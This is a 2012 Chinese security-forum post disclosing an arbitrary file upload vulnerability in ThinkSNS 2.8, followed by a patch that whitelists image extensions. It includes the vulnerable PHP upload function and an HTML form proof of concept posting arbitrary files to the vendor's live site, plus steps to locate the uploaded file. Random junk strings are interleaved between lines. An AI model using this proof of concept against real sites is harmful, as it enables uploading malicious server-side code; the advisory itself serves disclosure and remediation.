中国网络渗透测试联盟
标题:
ThinkSNS 2.8任意文件上传漏洞及修复
[打印本页]
作者:
admin
时间:
2012-12-4 11:12
标题:
ThinkSNS 2.8任意文件上传漏洞及修复
微博上传图片时只在前端进行验证, 服务器端没有进行安全过滤。
( [: r3 M0 b2 k: d. Q: y9 h
- r+ z+ o9 X3 `0 C" t* t
, j( p" g$ s, Z/ F& G* B$ n" f" i
\api\StatusesApi.class.php
( f5 q0 _4 h) H& P) p" C2 d% H7 S
" R1 U# ~. k6 z5 f3 |
function uploadpic(){
9 e. N, f6 G7 Y
if( $_FILES['pic'] ){
, V! \8 o+ c9 [; H) ]
//执行上传操作
8 x8 Q7 H; ?4 n& p8 z$ ]
$savePath = $this->_getSaveTempPath();
+ w9 m5 b2 C( k- f+ S: F
$filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
% f/ ~, b8 A; c, x1 O
if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
g+ U" F4 u8 I; e
{
. _7 x" Y/ R7 v8 C& \0 v
$result['boolen'] = 1;
6 L9 a7 u! ?5 ~( z* @5 w( T
$result['type_data'] = 'temp/'.$filename;
6 m* w) I: v k
$result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
( h, t. B, L9 h8 b
} else {
" y, F3 h- U+ x, w6 s' T3 \- {
$result['boolen'] = 0;
4 \$ j; m" w0 e% y' L2 ~2 j
$result['message'] = '上传失败';
: R$ V4 l4 M( {
}
! x/ h0 b8 G+ b; K
}else{
2 i; }3 a! ?( [5 p6 G9 Z
$result['boolen'] = 0;
& A3 n; T3 p& X, p o; P* g$ v
$result['message'] = '上传失败';
' b6 @8 Z+ t. l- B! c
}
: `* @3 W, f5 i6 y8 y
return $result;
5 H' p6 R! m0 x$ s
}
$ u3 i7 t+ l: ?6 N5 M& C0 X. R
unloadpic()方法没有对文件类型进行验证
6 R7 P E) ]7 [/ I$ E
' j9 f0 \8 u9 ^& C" Q" S
可以构建表单, 选择任意文件, 提交到
3 m' B7 z2 i1 ^' r7 _0 D5 S
/index.php?app=w3g&mod=Index&act=doPost
% z, q3 k0 Q5 J( E
) `- \& t! d. M; }
在新提交的微博上可以找到上传的文件地址(去掉small_、middle_ 前缀)
/ F6 b9 M- D- n! o: N: B
# a h2 ]% Y. Z1 h7 i: \/ p+ W
1 a6 y) ~) Y# J+ Y
在登录thinksns官方微博后,
" T* \! L i. ^
构建以下表单:
2 ?: s! o" ~7 L/ p, h$ r) a, o: s
9 F" X* K9 U1 }" ?
<form action="http://t.thinksns.com/index.php?app=w3g&mod=Index&act=doPost" method="post" enctype="multipart/form-data" />
# U. q7 r3 T8 R: ?7 e5 Z( j
<textarea name="content">test</textarea>
; Y1 e8 T5 a+ w, O' s7 b2 S$ W8 U: c
file: <input id="file" type="file" name="pic" />
0 ?, B1 \- p* M+ ~" i& k2 o0 A( A- v3 C
<input type="submit" value="Post" />
9 x }( r! B% R7 D9 I
</form>
" u9 f- ^2 w# c2 `
去掉缩略图的前缀(small_ )
1 e. }2 J7 K% x3 L: @
修复方案:
, n5 C S/ M" U }$ Y# F) ?: r/ W
: g7 P- @) `2 V) B1 y! T
4 N3 l. d4 k2 I: H- O
\api\StatusesApi.class.php
4 o, z8 N6 e8 r3 N7 e* j5 O1 X
4 E2 y, H1 y! h2 A8 _( X
function uploadpic(){
8 K% _. o. K" [1 s. @
/**
5 o7 E" p- d- J( _/ v
* 20121018 @yelo
0 G2 V, u. F [2 O0 V
* 增加上传类型验证
! I4 l2 e/ d+ W" v ~ M
*/
) L8 _2 {% V" q$ n6 H; u
$pathinfo = pathinfo($_FILES['pic']['name']);
9 ^' i* r* Q$ H# A9 v) T. N3 W
$ext = $pathinfo['extension'];
* S2 C% `9 v' H- U. x6 N
$allowExts = array('jpg', 'png', 'gif', 'jpeg');
/ ~+ f: Y: }% l
% x* d+ e' G1 H
$uploadCondition = $_FILES['pic'] && in_array(strtolower($ext),$allowExts,true);
% l5 E3 @7 I$ }1 |8 t8 x4 B7 [
2 R' Z0 Q! }/ Y, g1 P: Y2 O9 B
if( $uploadCondition ){
( M1 J8 E6 q, O% h; G
//执行上传操作
" C, r* F% |. E2 a; l, H
$savePath = $this->_getSaveTempPath();
- G1 E& l8 h3 v9 h I
$filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
6 T/ g1 ?/ N$ i
if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
_0 p6 l6 o1 y
{
8 c. U$ ^6 f+ @
$result['boolen'] = 1;
( y% E4 n' c& u/ Q! i- [% z
$result['type_data'] = 'temp/'.$filename;
! d2 J( n0 {$ L- w
$result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
: p/ w2 ?# L/ R+ ~9 \, h. ?
} else {
. S! y9 J% X9 \
$result['boolen'] = 0;
4 B2 x$ X# r+ B1 l6 H
$result['message'] = '上传失败';
' F0 u" Z$ t8 A) r* s. ^0 ~
}
: f1 @+ h" \, q% S ~! p0 q
}else{
6 i: `+ H; c$ k( p
$result['boolen'] = 0;
: i E7 T. W2 s& c+ `1 U& Y7 _
$result['message'] = '上传失败';
& m5 y& q! d& F/ s* O6 v
}
8 P" i9 E5 p: h, d6 G# x+ g
return $result;
( D5 T B- G# T. i0 x1 e
}
7 {: j4 ]5 F# d& `+ O0 B" E% ~9 s1 }
5 \% U7 k# z( d: A: _! S% z
' U, V2 N/ J- G) r3 j2 w
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2